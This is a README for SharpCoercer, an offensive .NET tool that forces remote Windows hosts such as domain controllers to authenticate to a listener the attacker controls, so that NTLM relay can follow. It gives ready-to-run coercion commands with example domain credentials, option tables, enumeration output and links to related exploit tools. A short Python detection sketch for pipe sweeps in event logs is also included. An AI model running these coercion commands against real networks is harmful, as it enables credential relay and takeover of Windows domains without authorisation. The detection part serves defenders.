SharpCoercer is a .NET Framework 4.8 tool that triggers authentication attempts from remote Windows hosts via RPC-based coercion techniques. It supports both SMB- and HTTP-based coercion, allowing you to redirect a target host’s authentication flow to a listener you control.
- Protocol Coercion: SMB and HTTP transport for authentication relay.
- Port Customization: Specify non-default SMB (445) and HTTP (80) ports.
- Discovery & Filtering:
  - List available RPC clients and named pipes.
  - Enumerate RPC methods per client.
  - Filter by RPC client name, method name, or pipe name.
- Flexible Invocation:
  - Single-run or unattended (`-always-continue`) modes.
  - Optional domain credentials or current user token.
- Extensible Architecture:
  - Add new RPC clients by implementing the `IRpcClient` interface.
- Clone the repository:

  ```
  git clone https://github.com/your-org/SharpCoercer.git
  cd SharpCoercer
  ```

- Build with Visual Studio (targeting .NET Framework 4.8) or via MSBuild:

  ```
  msbuild /p:Configuration=Release SharpCoercer.sln
  ```

- The compiled executable will be located in `bin/Release`.
```
SharpCoercer.exe -t <target> -l <listener> [options]
```

| Switch | Description |
|---|---|
| `-t, -target` | Remote host to coerce (IP address or DNS name). |
| `-l, -listener` | Your SMB share or HTTP listener (IP address or DNS). |

| Switch | Description |
|---|---|
| `-a, -auth-type` | Coercion transport: `smb` or `http` (default: `smb`). |
| `-sp, -smb-port <port>` | SMB port (default: 445). |
| `-hp, -http-port <port>` | HTTP port (default: 80). |
| `-d, -domain <domain>` | Domain name for supplied credentials. |
| `-u, -username <user>` | Username for RPC binding. |
| `-p, -password <pass>` | Password for RPC binding. |
| `-np, -namedpipe-filter <n>` | Filter named pipes by substring. |
| `-r, -rpc-filter <n>` | Filter RPC client classes by substring. |
| `-m, -method-filter <n>` | Filter RPC methods by substring. |
| `-lr, -listrpcs` | List all available RPC clients and exit. |
| `-lp, -listPipes` | List all available named pipes and exit. |
| `-lf, -listfunctions` | List all RPC methods (with optional `-r` filter) and exit. |
| `-c, -always-continue` | Skip interactive prompts between calls. |
| `-e, -enumerate` | Enumerate all available named pipes on the target and attempt to bind to each one. |

```
# Coerce via SMB (default) using domain credentials
SharpCoercer.exe -t 192.168.1.10 -l 192.168.1.20 -d CORP -u Administrator -p "P@ssw0rd"

# Coerce via HTTP listener on custom port
SharpCoercer.exe -t dc1.corp.local -l mylistener.example.com -a http -hp 8080 -c

# Enumerate RPC methods for the MS-RPRN client
SharpCoercer.exe -lr -r RprnRpcClient -lf
```

```
.\SharpCoercer.exe -t dc.hecker.local -u adam -p Temp123 -d hecker.local -l 192.168.163.129 -c
```

```
.\SharpCoercer.exe -t dc.hecker.local -u adam -p Temp123 -d hecker.local -l 192.168.163.129 -c -a http
```

- Web Client must be enabled on the target machine.
- WebDAV authentication only works if the domain name can be resolved via DNS or NetBIOS. You can’t coerce HTTP authentication unless you have NetBIOS name resolution or you’ve created a DNS record in Active Directory DNS.

| Interface | Named Pipe | Description |
|---|---|---|
| `RprnRpcClient` | `\PIPE\spoolss` | MS-RPRN (Print Spooler) |
| `FsrvpRpcClient` | `\PIPE\winsvr` | MS-FSRVP (File Server VSS) |
| `DfsmRpcClient` | `\PIPE\dfsnm` | MS-DFSNM (DFS Namespace Management) |
| `EfsRpcClient` | `\PIPE\lsarpc` | EFSRPC (Encrypting File System) |

```
.\SharpCoercer.exe -lf
[MS-DFSNM] (An RPC interface through which clients remotely configure and manage DFS namespaces)
- NetrDfsRemoveStdRoot
- NetrDfsAddStdRoot
[MS-EFSR] (RPC-based protocol for remote maintenance of encrypted network file data.)
- EfsRpcAddUsersToFile
- EfsRpcEncryptFileSrv
- EfsRpcDecryptFileSrv
- EfsRpcQueryRecoveryAgents
- EfsRpcQueryUsersOnFile
- EfsRpcRemoveUsersFromFile
- EfsRpcFileKeyInfo
- EfsRpcOpenFileRaw
- EfsRpcDuplicateEncryptionInfoFile
- EfsRpcAddUsersToFileEx
[MS-FSRVP] (The File Server Remote VSS Protocol (FSRVP) is an RPC-based service for creating application-consistent shadow copies of remote file shares.)
- IsPathSupported
- IsPathShadowCopied
[MS-RPRN] (RPC-based protocol for synchronous printing, spooling, and print job management.)
- RpcRemoteFindFirstPrinterChangeNotificationEx
```

```
.\SharpCoercer.exe -lp
Available Pipes:
- \pipe\netdfs
- \pipe\netlogon
- \pipe\efsrpc
- \pipe\fssagentrpc
- \pipe\spoolss
- \pipe\lsarpc
- \pipe\lsass
- \pipe\samr
```

```
.\SharpCoercer.exe -lr
Available RPC Clients:
- MS-DFSNM
- MS-EFSR
- MS-FSRVP
- MS-RPRN
```

```
.\SharpCoercer.exe -e -t 192.168.163.128 -u adam -p Temp123 -d hecker
[+] Using auth-type: SMB, SMB port: 445, HTTP port: 80
[+] Using credentials: hecker\adam:Temp123
[+] Connected to \\192.168.163.128\IPC$ as hecker\adam
== MS-DFSNM ==
[+] Found pipe \pipe\netdfs on 192.168.163.128
Binding to 192.168.163.128 \pipe\netdfs
binding ok (handle=2305824077904)
== MS-EFSR ==
[+] Found pipe \pipe\netlogon on 192.168.163.128
Binding to 192.168.163.128 \pipe\netlogon
binding ok (handle=2305824085616)
== MS-EFSR ==
[-] Pipe \PIPE\efsrpc missing on 192.168.163.128, skipping
== MS-FSRVP ==
[+] Found pipe \pipe\FssagentRpc on 192.168.163.128
Binding to 192.168.163.128 \pipe\FssagentRpc
binding ok (handle=2305824134848)
== MS-RPRN ==
[+] Found pipe \pipe\spoolss on 192.168.163.128
== MS-EFSR ==
[+] Found pipe \pipe\lsarpc on 192.168.163.128
Binding to 192.168.163.128 \pipe\lsarpc
binding ok (handle=2305824135248)
== MS-EFSR ==
[+] Found pipe \PIPE\lsass on 192.168.163.128
Binding to 192.168.163.128 \PIPE\lsass
binding ok (handle=2305824135648)
== MS-EFSR ==
[+] Found pipe \PIPE\samr on 192.168.163.128
Binding to 192.168.163.128 \PIPE\samr
binding ok (handle=2305824136048)
```
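
On the target, a sweep like the `-e` run above shows up as Security event 5145 records for `IPC$` when detailed file share auditing is enabled. The following detection sketch is an added example, not part of SharpCoercer: it flags a source that opens several of the listed pipes within a short window. The threshold, the window, the `make_event` helper and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Pipe names from the -lp listing, with the protocol header the -e run printed for each.
WATCHED_PIPES = {
    "netdfs": "MS-DFSNM", "netlogon": "MS-EFSR", "efsrpc": "MS-EFSR",
    "fssagentrpc": "MS-FSRVP", "spoolss": "MS-RPRN", "lsarpc": "MS-EFSR",
    "lsass": "MS-EFSR", "samr": "MS-EFSR",
}

def watched_pipe(event):
    """Return the watched pipe a 5145 IPC$ event touches, else None."""
    if event.get("EventID") != 5145:
        return None
    if not event.get("ShareName", "").upper().endswith("\\IPC$"):
        return None
    name = event.get("RelativeTargetName", "").strip("\\").lower()
    return name if name in WATCHED_PIPES else None

def find_pipe_sweeps(events, min_pipes=4, window=timedelta(seconds=60)):
    """Flag (source IP, account) pairs opening >= min_pipes distinct watched pipes in one window."""
    by_source = defaultdict(list)
    for ev in events:
        pipe = watched_pipe(ev)
        if pipe:
            ts = datetime.fromisoformat(ev["TimeCreated"])
            by_source[(ev["IpAddress"], ev["SubjectUserName"])].append((ts, pipe))
    alerts = []
    for source, hits in by_source.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {p for t, p in hits[i:] if t - start <= window}
            if len(seen) >= min_pipes:  # one alert per source, at the first dense window
                alerts.append({"source": source, "first_seen": start.isoformat(),
                               "pipes": sorted(seen),
                               "protocols": sorted({WATCHED_PIPES[p] for p in seen})})
                break
    return alerts

def make_event(ts, ip, user, target, share="\\\\*\\IPC$"):
    """Build a constructed 5145-style record (hypothetical helper for the sample data)."""
    return {"EventID": 5145, "TimeCreated": "2024-01-01T" + ts, "IpAddress": ip,
            "SubjectUserName": user, "ShareName": share, "RelativeTargetName": target}

# Constructed sample events (not real logs): one fast sweep, one slow client, one file access.
SAMPLE_EVENTS = (
    [make_event(f"10:00:0{i}", "10.0.0.50", "jdoe", p) for i, p in
     enumerate(["netdfs", "netlogon", "FssagentRpc", "spoolss", "lsarpc"])]
    + [make_event(f"{8 + i:02d}:00:00", "10.0.0.30", "prn01$", p) for i, p in
       enumerate(["spoolss", "lsarpc", "samr", "netlogon"])]
    + [make_event("10:00:05", "10.0.0.21", "asmith", "report.docx", share="\\\\*\\Finance")]
)
```

Pipes such as `lsarpc`, `samr` and `netlogon` see routine traffic on domain controllers, so the signal here is the number of distinct pipes per source in a short window rather than any single access.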

- MITM and Coerced Authentications
  https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/
  A deep-dive tutorial covering NTLM relay, SMB/HTTP coercion, and advanced RPC-based authentication coercion techniques.
- https://github.com/cube0x0/SharpSystemTriggers
  C# tool to trigger Windows system services (e.g., Print Spooler, Certificate Authority) via HTTP requests, causing remote hosts to authenticate back to an attacker-controlled listener.
- https://github.com/topotam/PetitPotam
  Python implementation of the EFSRPC protocol methods (excluding patched ones) to coerce a target into sending NTLM authentication to a remote SMB or HTTP listener.
- https://github.com/leechristensen/SpoolSample
  Minimal C# proof-of-concept demonstrating how to invoke the MS-RPRN (Print Spooler) RPC interface to force authentication over SMB or HTTP.
- https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
  Python script in the Kerberos relay toolkit that abuses the Print Spooler (MS-RPRN) to capture Kerberos tickets and/or relay authentication to other services.
- https://github.com/ShutdownRepo/ShadowCoerce
  C# and Python payloads to exploit unpatched EFSRPC methods for NTLM coercion, similar to PetitPotam but with additional automation and payload flexibility.
- https://github.com/Wh04m1001/DFSCoerce
  C# tool targeting the MS-DFSNM (DFS Namespace Management) RPC interface, coercing remote hosts to authenticate to a specified SMB/HTTP listener via DFS calls.

- x64 Only: The tool is only supported on 64-bit (x86_64) systems. It will not run on 32-bit architectures.
- NTLM-Disabled Environments: On systems where NTLM authentication has been disabled (for example via Group Policy), it is not possible to coerce authentication over SMB/HTTP from remote, non–domain-joined machines.

- x86 Support: Add compatibility for 32-bit Windows hosts.
- Alternative Coercion Methods: Research and implement Kerberos-based or other non-NTLM coercion techniques.
- Hardened Systems: Develop fallback mechanisms or detection routines to enable coercion in environments with NTLM turned off.

Pull requests are welcome. Feel free to open an issue if you want to add other features.
- @tifkin_ and @elad_shamir for finding and implementing PrinterBug on MS-RPRN
- @topotam77 for finding and implementing PetitPotam on MS-EFSR
- @topotam77 for finding and @_nwodtuhs for implementing ShadowCoerce on MS-FSRVP
- @filip_dragovic for finding and implementing DFSCoerce on MS-DFSNM
- @evilashz for finding and implementing CheeseOunce on MS-EVEN